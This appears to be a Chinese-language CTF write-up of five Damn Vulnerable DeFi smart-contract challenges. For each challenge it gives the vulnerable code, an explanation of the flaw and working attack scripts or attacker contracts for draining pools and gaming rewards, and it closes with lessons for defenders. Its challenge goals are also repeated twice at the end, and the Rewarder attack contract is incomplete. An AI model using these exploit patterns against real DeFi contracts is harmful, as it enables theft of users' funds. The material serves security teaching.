Damn Vulnerable DeFi Challenges 教学文档<\/h1>

前言<\/h2>

本教学文档基于奇安信攻防社区的Damn Vulnerable DeFi挑战系列，旨在通过实践学习智能合约安全漏洞。建议使用Hardhat或Foundry开发环境，并预先了解以下内容：<\/p>

Hardhat基础使用<\/li>
Solidity智能合约安全与代码质量标准<\/li>
常见智能合约漏洞及防范方法<\/li>

基本JavaScript语法（用于与合约交互）<\/li> <\/ul>

Challenge #1 - Unstoppable<\/h2>

挑战目标<\/h3>
使金库停止提供闪贷服务。<\/p>

合约分析<\/h3>

UnstoppableVault.sol<\/code>关键代码：<\/p>

function<\/span> flashLoan<\/span>(...) external<\/span> returns<\/span> (bool<\/span>) {
<\/span><\/span>    uint256<\/span> balanceBefore =<\/span> totalAssets();
<\/span><\/span>    if<\/span> (convertToShares(totalSupply) !=<\/span> balanceBefore) revert InvalidBalance();
<\/span><\/span>    \/\/ ...其他代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

balanceBefore<\/code>通过totalAssets()<\/code>获取，包含所有转入Vault的DVT代币<\/li>
convertToShares(totalSupply)<\/code>计算已发行的oDVT代币对应的DVT数量<\/li>
正常情况下两者应相等（1:1兑换）<\/li>
但直接调用token.transfer<\/code>转入代币会增加balanceBefore<\/code>而不增加totalSupply<\/code><\/li>
<\/ol>
攻击方法<\/h3>
直接向Vault合约地址转账任意数量DVT代币：<\/p>
await<\/span> token<\/span>.connect<\/span>(player<\/span>).transfer<\/span>(vault<\/span>.address<\/span>, 1<\/span>);
<\/span><\/span><\/code><\/pre>Challenge #2 - Naive Receiver<\/h2>
挑战目标<\/h3>
清空用户合约中的所有ETH（10 ETH），尽可能在一次交易中完成。<\/p>
合约分析<\/h3>
NaiveReceiverLenderPool.sol<\/code>关键代码：<\/p>
function<\/span> flashLoan<\/span>(...) external<\/span> returns<\/span> (bool<\/span>) {
<\/span><\/span>    \/\/ 固定收取1 ETH费用
<\/span><\/span><\/span><\/span>    if<\/span> (address<\/span>(this).balance <<\/span> balanceBefore +<\/span> FIXED_FEE) revert RepayFailed();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>FlashLoanReceiver.sol<\/code>关键代码：<\/p>
function<\/span> onFlashLoan<\/span>(...) external<\/span> returns<\/span> (bytes32<\/span>) {
<\/span><\/span>    \/\/ 不验证调用者身份
<\/span><\/span><\/span><\/span>    amountToBeRepaid =<\/span> amount +<\/span> fee; \/\/ 1 ETH固定费用
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

闪电贷合约不验证调用者身份<\/li>
任何人都可以为接收者合约发起闪电贷<\/li>
每次闪电贷固定收取1 ETH费用<\/li>
<\/ol>
攻击方法<\/h3>
连续调用10次闪电贷（每次消耗1 ETH）：<\/p>
const<\/span> ETH<\/span> =<\/span> await<\/span> pool<\/span>.ETH<\/span>();
<\/span><\/span>for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 10<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>    await<\/span> pool<\/span>.connect<\/span>(player<\/span>).flashLoan<\/span>(receiver<\/span>.address<\/span>, ETH<\/span>, 0<\/span>, "0x"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Challenge #3 - Truster<\/h2>
挑战目标<\/h3>
清空池子中的100万DVT代币，尽可能在一次交易中完成。<\/p>
合约分析<\/h3>
TrusterLenderPool.sol<\/code>关键代码：<\/p>
function<\/span> flashLoan<\/span>(...) external<\/span> nonReentrant returns<\/span> (bool<\/span>) {
<\/span><\/span>    token.transfer(borrower, amount);
<\/span><\/span>    target.functionCall(data); \/\/ 可以任意调用目标合约
<\/span><\/span><\/span><\/span>    \/\/ 仅检查余额是否减少
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

functionCall<\/code>允许以Pool身份调用任意合约<\/li>
可以构造approve<\/code>调用授权攻击者使用Pool的代币<\/li>
之后通过transferFrom<\/code>转走代币<\/li>
<\/ol>
攻击方法<\/h3>
let<\/span> interface<\/span> =<\/span> new<\/span> ethers<\/span>.utils<\/span>.Interface<\/span>(["function approve(address spender, uint256 amount)"<\/span>]);
<\/span><\/span>let<\/span> data<\/span> =<\/span> interface<\/span>.encodeFunctionData<\/span>("approve"<\/span>, [player<\/span>.address<\/span>, TOKENS_IN_POOL<\/span>]);
<\/span><\/span>await<\/span> pool<\/span>.connect<\/span>(player<\/span>).flashLoan<\/span>(0<\/span>, player<\/span>.address<\/span>, token<\/span>.address<\/span>, data<\/span>);
<\/span><\/span>await<\/span> token<\/span>.connect<\/span>(player<\/span>).transferFrom<\/span>(pool<\/span>.address<\/span>, player<\/span>.address<\/span>, TOKENS_IN_POOL<\/span>);
<\/span><\/span><\/code><\/pre>Challenge #4 - Side Entrance<\/h2>
挑战目标<\/h3>
从初始1000 ETH的池子中取出所有ETH，初始只有1 ETH余额。<\/p>
合约分析<\/h3>
SideEntranceLenderPool.sol<\/code>关键代码：<\/p>
function<\/span> flashLoan<\/span>(uint256<\/span> amount) external<\/span> {
<\/span><\/span>    IFlashLoanEtherReceiver(msg.sender).execute{value:<\/span> amount}();
<\/span><\/span>    \/\/ 仅检查余额是否减少
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> deposit<\/span>() external<\/span> payable<\/span> {
<\/span><\/span>    balances[msg.sender] +=<\/span> msg.value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

闪电贷还款可以通过存款方式完成<\/li>
存款会增加攻击者在合约中的余额<\/li>
之后可以合法提取这些存款<\/li>
<\/ol>
攻击方法<\/h3>
\/\/ 攻击合约
<\/span><\/span><\/span><\/span>contract<\/span> SideEntranceHacker<\/span> is<\/span> IFlashLoanEtherReceiver {
<\/span><\/span>    function<\/span> execute<\/span>() external<\/span> payable<\/span> {
<\/span><\/span>        pool.deposit{value:<\/span> 1000<\/span> ether<\/span>}();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> exploit<\/span>() external<\/span> payable<\/span> {
<\/span><\/span>        pool.flashLoan(1000<\/span> ether<\/span>);
<\/span><\/span>        pool.withdraw();
<\/span><\/span>        payable<\/span>(tx.origin).transfer(1000<\/span> ether<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Challenge #5 - The Rewarder<\/h2>
挑战目标<\/h3>
在没有DVT代币的情况下，在下一轮奖励分配中获得大部分奖励。<\/p>
合约分析<\/h3>
关键合约：<\/p>

FlashLoanerPool<\/code>：提供DVT闪贷<\/li>
TheRewarderPool<\/code>：每5天分配奖励<\/li>
AccountingToken<\/code>：记录存款的快照代币<\/li>
RewardToken<\/code>：奖励代币<\/li>
<\/ol>
漏洞原理<\/h3>

奖励基于快照时的存款比例分配<\/li>
可以在新轮次开始时借入大量DVT并立即存款<\/li>
获取快照后归还闪贷<\/li>
<\/ol>
攻击方法<\/h3>

等待新轮次开始<\/li>
闪贷借入大量DVT<\/li>
存入RewarderPool<\/li>
触发奖励分配<\/li>
提取存款并归还闪贷<\/li>
<\/ol>
\/\/ 攻击合约
<\/span><\/span><\/span><\/span>contract<\/span> RewarderAttacker<\/span> {
<\/span><\/span>    function<\/span> attack<\/span>() external<\/span> {
<\/span><\/span>        \/\/ 1. 借入闪贷
<\/span><\/span><\/span><\/span>        flashLoaner.flashLoan(TOKENS_IN_POOL);
<\/span><\/span>        
<\/span><\/span>        \/\/ 在回调中：
<\/span><\/span><\/span><\/span>        \/\/ 2. 存入RewarderPool
<\/span><\/span><\/span><\/span>        rewarder.deposit(TOKENS_IN_POOL);
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 领取奖励
<\/span><\/span><\/span><\/span>        rewarder.distributeRewards();
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 提取存款
<\/span><\/span><\/span><\/span>        rewarder.withdraw(TOKENS_IN_POOL);
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 归还闪贷
<\/span><\/span><\/span><\/span>        token.transfer(address<\/span>(flashLoaner), TOKENS_IN_POOL);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> receiveFlashLoan<\/span>(uint256<\/span> amount) external<\/span> {
<\/span><\/span>        token.approve(address<\/span>(rewarder), amount);
<\/span><\/span>        \/\/ 其他攻击步骤...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
这些挑战展示了DeFi中常见的安全问题：<\/p>

状态验证不足（Unstoppable）<\/li>
访问控制缺失（Naive Receiver）<\/li>
任意调用风险（Truster）<\/li>
业务逻辑绕过（Side Entrance）<\/li>
闪电贷操纵协议状态（The Rewarder）<\/li>
<\/ol>
开发者应特别注意：<\/p>

严格的状态验证<\/li>
完善的访问控制<\/li>
限制外部调用范围<\/li>
防止业务逻辑被绕过<\/li>
考虑闪电贷对协议的影响<\/li>
<\/ul>

Damn Vulnerable DeFi Challenges 教学文档<\/h1>

Challenge #1 - Unstoppable<\/h2>

挑战目标<\/h3> 使金库停止提供闪贷服务。<\/p>

Challenge #2 - Naive Receiver<\/h2>

挑战目标<\/h3> 清空用户合约中的所有ETH（10 ETH），尽可能在一次交易中完成。<\/p>

Challenge #3 - Truster<\/h2>

挑战目标<\/h3> 清空池子中的100万DVT代币，尽可能在一次交易中完成。<\/p>

Challenge #4 - Side Entrance<\/h2>

挑战目标<\/h3> 从初始1000 ETH的池子中取出所有ETH，初始只有1 ETH余额。<\/p>

Challenge #5 - The Rewarder<\/h2>

挑战目标<\/h3> 在没有DVT代币的情况下，在下一轮奖励分配中获得大部分奖励。<\/p>

挑战目标<\/h3>
使金库停止提供闪贷服务。<\/p>

挑战目标<\/h3>
清空用户合约中的所有ETH（10 ETH），尽可能在一次交易中完成。<\/p>

挑战目标<\/h3>
清空池子中的100万DVT代币，尽可能在一次交易中完成。<\/p>

挑战目标<\/h3>
从初始1000 ETH的池子中取出所有ETH，初始只有1 ETH余额。<\/p>

挑战目标<\/h3>
在没有DVT代币的情况下，在下一轮奖励分配中获得大部分奖励。<\/p>